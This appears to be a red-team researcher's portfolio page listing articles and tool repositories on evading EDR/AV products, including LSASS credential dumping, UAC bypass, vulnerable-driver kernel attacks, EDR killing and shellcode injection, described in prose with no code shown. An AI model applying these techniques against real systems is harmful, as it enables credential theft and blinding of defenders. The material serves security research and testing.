Open Source Work
Evasion Series

C:\Users\Offensive-Panda>whoami

Usman Sikander (a.k.a Offensive-Panda) is a seasoned security professional passionate to identifying and researching advanced evasion techniques, to develop a comprehensive understanding of threat tactics, techniques, and procedures (TTPs) through in-depth analysis of real-world attack scenarios, prominent Advanced Persistent Threat (APT) campaigns, and emerging evasion tactics for validating security postures through emulations. With a proven track record in developing exploits aligned with MITRE ATT&CK tactics and automating exploit processes, I excel in conducting comprehensive simulations within controlled environments that include all security controls. My primary objective is to identify the weaknesses, mis-configuration, vulnerabilities, validate the security controls, incident response capabilities and identify areas for improvement, deliver detailed threat analysis for proactive threat hunting, providing adversary attack paths, indicators of attack (IOAs), indicators of compromise (IOCs), and actionable mitigation strategies to strengthen and enhance an organisation's detection engineering capabilities.

Purpose

This collection offers advanced methods to bypass sophisticated security measures in Endpoint Detection and Response (EDR) and Extended Detection and Response (XDR) systems. This comprehensive and central repository is designed for cybersecurity enthusiasts, researchers, and professionals seeking to stay ahead in the field. It provides a valuable resource for those dedicated to improving their skills, security defenses and measures. This repository includes strategies for manipulating system calls, obfuscating code, managing memory to evade detection and other advanced evasion techniques. By leveraging these methods, experts can enhance penetration testing, red teaming, malware analysis, and develop more resilient defenses.

Evasion Techniques Heatmap

Direct and Indirect Syscalls
API Hashing
API Imports Obfuscation
Payload Encryption
Egg Hunting
UAC Bypass
COR_PROFILER
Random Instructions and Prototypes
Mokingjay
Forking Technique Memory Dumps
API Unhooking
ETW Patching
PEB Lookup
Disable and Modify Tools
Lagos Island (Reflective Loading)
RWX Memory Block Hunt
BYOVD

Check Out My Articles

BYOVD A Kernel Attack

BYOVD A Kernel Attack: Stealthy Threat to Endpoint Security

Delve into the intricacies of BYOVD attacks, exploring how malicious actors exploit this technique to blind, terminate, and manipulate endpoint detection and response (EDR) solutions. We will dissect the mechanisms used to obtain NT Authority context and remove EDR callbacks, providing practical demonstrations of these attacks.

Read More
Arsenal 2.0

Arsenal 2.0: Elevating Malware Stealth Tactics to Bypass Static Detection

Diving into advanced techniques for malware to evade static detection by EDR/XDR solutions. This blog is an extension of my previous post, "Arsenal: Bypass EDR’s/XDR’s and make malware analysis harder".

Read More
PEB Walk

PEB Walk: Avoid API function calls inspection in IAT by analyst and also bypass static detection of AV/EDR

Techniques to evade static detection methods used by AV/EDR solutions. We divide our arsenal preparation into 4 main stages, we try to hide strings, API imports by obfuscating them, resolve API using different ways such as dynamically.

Read More
Arsenal

Arsenal: Bypass EDR’s/XDR’s and make malware analysis harder

An exploration of methods to bypass modern EDR/XDR. Multiple techniques to bypass AV/EDR/XDR security solutions. As a red teamer and security guy, I always try to explore new methods and approaches to bypass security controls.

Read More
On-Disk Detection

On-Disk Detection: Bypass AV’s/EDR’s using syscalls with legacy instruction, series of instructions and random nop instructions

Techniques to bypass AV/EDR’s static as well as dynamic detection. The main focus is to bypass on-disk detection of binary which is using direct syscalls.

Read More
EASE POST-EXPLOITATION

EASE POST-EXPLOITATION: Getting elevated reverse shell using DLL Hijacking and Mock Directories

DLL Hijacking and Mock directories technique to bypass Windows UAC security feature and getting high-level privileged reverse shell.

Read More
AV/EDR Evasion Using Direct System Calls

AV/EDR Evasion Using Direct System Calls (User-Mode vs Kernel-Mode)

Hooking is a method used by AV/EDRs to intercept a function call and redirect the code flow to a controlled environment where they can analyze the call and decide whether or not it is malicious.

Read More
Bypass Mimikatz

Bypass “Mimikatz” using the Process Injection Technique

Bypass Mimikatz using process injection. Most of the EDR’s/AV often identify mimikatz signatures and destroy it. There are many ways to bypass mimikatz from AV/EDR’s.

Read More

Code Implementation

D3MPSEC

D3MPSEC

"D3MPSEC" is a memory dumping tool designed to extract memory dump from Lsass process using various techniques, including direct system calls, randomized procedures, and prototype name obfuscation.

View on GitHub
Dirty Vanity

Dirty Vanity (DV_NEW)

This is the combination of multiple evasion techniques. It is using direct syscalls to bypass user-mode EDR hooking and also to avoid static detection of syscalls instruction in stub I am using egg hunt technique.

View on GitHub
Honeypots

Honeypots for Threat Intelligence

Run as a service and monitoring all sysmon event logs and take action based on events generated by attacker's activities. Upload all dropped and created malwares, files on server for further analysis. This captures all commands executed by attacker on a system.

View on GitHub
Persistence

Persistence and Anti-Sandbox

This reposiorty contains the c# code which is using latest persistence technique and multiple anti-vm, anti-sandboxes techniques. In this program, I am using 4 anti-vm and anti-sanboxe techniques, I am also using persistence technique using powershell and task scheduler.

View on GitHub
Static Analysis

Bypass Malware Static Analysis

Direct syscalls Injection to bypass AV/EDR. The main purpose of this repository is to understand the static detection and how to bypass it. When I was using direct syscalls in my implant, after compiling the code MDE was detecting the binary in static analysis.

View on GitHub
DLL Hijacking

C2 Elevated Shell via DLL Hijacking

DLL Hijacking and Mock directories technique to bypass Windows UAC security feature and getting high-level privileged reverse shell. Security researchers identified this technique which uses a simplified process of DLL hijacking and mock folders to bypass UAC control.

View on GitHub
RWX Memory

RWX Memory Hunt and Injection

Abusing Windows fork API and OneDrive.exe process to inject the malicious shellcode without allocating new RWX memory region. This technique is finding RWX region in already running processes in this case OneDrive.exe and Write shellcode into that region and execute it without calling VirtualProtect, VirtualAllocEx, VirtualAlloc.

View on GitHub
WPM Magic

WPM Magic and Injection

Utilising AddressOfEntryPoint of process which is RX and using WriteProcessMemory internal magic to change the permission and write the shellcode. Exploit also using direct syscalls to bypass user-mode hooking of AV/EDRs. This technique is avoiding the usage of VirtualAlloc, VirtualProtect APIs.

View on GitHub
PEB Walk

PEB Walk and API Obfuscation

This exploit use PEB walk technique to resolve API calls dynamically and obfuscate all API calls to perform process injection. These technqies will help to bypass static analysis of AV/EDR solutions. To outline the process, the PEB walk for resolving the addresses of LoadLibraryA and GetProcAddress is as follows.

View on GitHub
.NET Profiler

.NET Profiler DLL Loading UAC Bypass

.NET profiler DLL loading can be abused to make a legit .NET application load a malicious DLL using environment variables. This exploit is loading a malicious DLL using Task Scheduler (MMC) to bypass UAC and getting admin privileges.

View on GitHub
BYOVD

BYOVD for Privilege Escalation

This exploit rebuilds and exploit the CVE-2019-16098 which is in driver Micro-Star MSI Afterburner 4.6.2.15658 (aka RTCore64.sys and RTCore32.sys) allows any authenticated user to read and write to arbitrary memory, I/O ports, and MSRs. Instead of hardcoded base address of Ntoskrnl.exe.

View on GitHub

Demonstration

Dirty Vanity Implementation Using Direct Syscalls

Dirty Vanity Implementation Using Direct Syscalls

This is the combination of multiple evasion techniques. It is using direct syscalls to bypass user-mode EDR hooking and also to avoid static detection of syscalls instruction in stub I am using egg hunt technique. Egg hunt will place random bytes using DB instruction in syscall stub in the place of syscalls

Read More
Mockingjay Technique to Avoid RWX Region Detection

Mockingjay Technique to Avoid RWX Region Detection

Utilizes vulnerable DLLs to avoid detection of RWX (Read-Write-Execute) memory regions. This technique helps bypass security mechanisms that monitor or restrict RWX memory allocations by exploiting existing vulnerabilities.

Read More
Combining Unhooking and ETW Patching to Dump LSASS Memory

Combining Unhooking and ETW Patching to Dump LSASS Memory

Explores advanced techniques for evading defenses to dump lsass,exe process memory. Combining Unhooking and ETW Patching: Integrates unhooking techniques with ETW (Event Tracing for Windows) patching to effectively dump LSASS (Local Security Authority Subsystem Service) memory.

Read More
Direct syscalls to dump LSASS.exe memory and offline dumping

Direct Syscalls to Dump LSASS.exe Memory and Offline Dumping

Dumping LSASS memory using direct syscalls to bypass EDR detections. Bypassing traditional APIs hooking and security mechanisms.

Read More
Remote Template Injection

Remote Template Injection

An exploration of techniques for injecting remote templates to achieve initial access. Created a attack cycle using remote template injection. Remote template injection is still working on Windows and has been used in many APT campaigns.

Read More
Mark-of-the-Web for Red Team

Mark-of-the-Web for Red Team

Bypass security features related to Mark-of-the-Web in Red Team engagements. For macros in files obtained from the internet, users will no longer be able to enable content with a click of a button. A message bar will appear for users notifying them with a button to learn more.

Read More
Memory dump using Outflank Dumpert and Windows process injection

Memory Dump Using Outflank Dumpert and Windows Process Injection

Utilizes the Outflank Dumpert tool to dump lsass.exe memory and combines it with process injection techniques.

Read More
NT-Authority Shell using Fodhelper

NT-Authority Shell using Fodhelper

How to exploit Fodhelper to gain NT-Authority level access on compromised systems.

Read More
RWX-Memory Hunt and Injection with CreateRemoteThread

RWX-Memory Hunt and Injection with CreateRemoteThread

Identifying and exploiting RWX memory regions to inject code via CreateRemoteThread technique. Identifies and utilizes RWX (Read-Write-Execute) memory regions for code injection, leveraging CreateRemoteThread to execute the injected code within the target process.

Read More
Terminator

EDR Terminator (Call It Killer)

Attack and Kill the guards, so that you can perform rest of your work easily. 𝐓𝐞𝐫𝐦𝐢𝐧𝐚𝐭𝐢𝐧𝐠 𝐖𝐢𝐧𝐝𝐨𝐰𝐬 𝐃𝐞𝐟𝐞𝐧𝐝𝐞𝐫 by using BYOVD technique. . A technique designed to disable or bypass Endpoint Detection and Response (EDR) systems, often by targeting and manipulating EDR processes or services to evade detection.

Read More
Lagos Island

LSASS.exe Memory Dumping Using Multiple Techniques

𝘓𝘴𝘢𝘴𝘴.𝘦𝘹𝘦 𝘔𝘦𝘮𝘰𝘳𝘺 𝘋𝘶𝘮𝘱𝘪𝘯𝘨 𝘶𝘴𝘪𝘯𝘨 𝘤𝘰𝘮𝘣𝘪𝘯𝘢𝘵𝘪𝘰𝘯 𝘰𝘧 𝘵𝘩𝘳𝘦𝘦 𝘵𝘦𝘤𝘩𝘯𝘪𝘲𝘶𝘦𝘴 [𝐋𝐚𝐠𝐨𝐬 𝐈𝐬𝐥𝐚𝐧𝐝 𝐌𝐞𝐭𝐡𝐨𝐝 (𝐚.𝐤.𝐚 𝐑𝐞𝐟𝐥𝐞𝐜𝐭𝐢𝐯𝐞𝐋𝐨𝐚𝐝𝐢𝐧𝐠), 𝐖𝐢𝐧𝐝𝐨𝐰𝐬 𝐏𝐫𝐨𝐜𝐞𝐬𝐬 𝐈𝐧𝐣𝐞𝐜𝐭𝐢𝐨𝐧: 𝐂𝐨𝐧𝐬𝐨𝐥𝐞𝐖𝐢𝐧𝐝𝐨𝐰𝐂𝐥𝐚𝐬𝐬, 𝐖𝐢𝐧𝐝𝐨𝐰𝐬 𝐅𝐨𝐫𝐤𝐢𝐧𝐠].

Read More
.NET Profiler

UAC Bypass Using .NET Profiler DLL Loading Vulnerability

.NET profiler DLL loading can be abused to make a legit .NET application load a malicious DLL using environment variables. This exploit is loading a malicious DLL using Task Scheduler (MMC) to bypass UAC and getting admin privileges.

Read More
EDR Callbacks

Remove EDR Callbacks Using Vulnerable Driver

Explores the use of a vulnerable driver to disable EDR callbacks. BYOVD technique to remove 𝐌𝐢𝐜𝐫𝐨𝐬𝐨𝐟𝐭 𝐃𝐞𝐟𝐞𝐧𝐝𝐞𝐫 𝐏𝐬𝐒𝐞𝐭𝐂𝐫𝐞𝐚𝐭𝐞𝐏𝐫𝐨𝐜𝐞𝐬𝐬𝐍𝐨𝐭𝐢𝐟𝐲𝐑𝐨𝐮𝐭𝐢𝐧𝐞 callback routine. EDRs are using different callback routines to monitor the activities and sending telemetry for further analysis.

Read More
PE BYOVD

Privilege Escalation Using Vulnerable Driver

A guide to exploiting vulnerabilities in drivers to escalate privileges on compromised systems. Driver Micro-Star MSI Afterburner 4.6.2.15658 (aka 𝐑𝐓𝐂𝐨𝐫𝐞64.𝐬𝐲𝐬 and 𝐑𝐓𝐂𝐨𝐫𝐞32.𝐬𝐲𝐬) allows any authenticated user to read and write to arbitrary memory, I/O ports, and MSRs.

Read More

Writeups For Cyber Community

References

Disclaimer

The content, techniques, and tools provided in this repository are intended solely for educational and research purposes within the cybersecurity community. I explicitly disclaim any responsibility for the misuse or unlawful use of the provided materials. Any actions taken based on the information are done so at the user's own risk.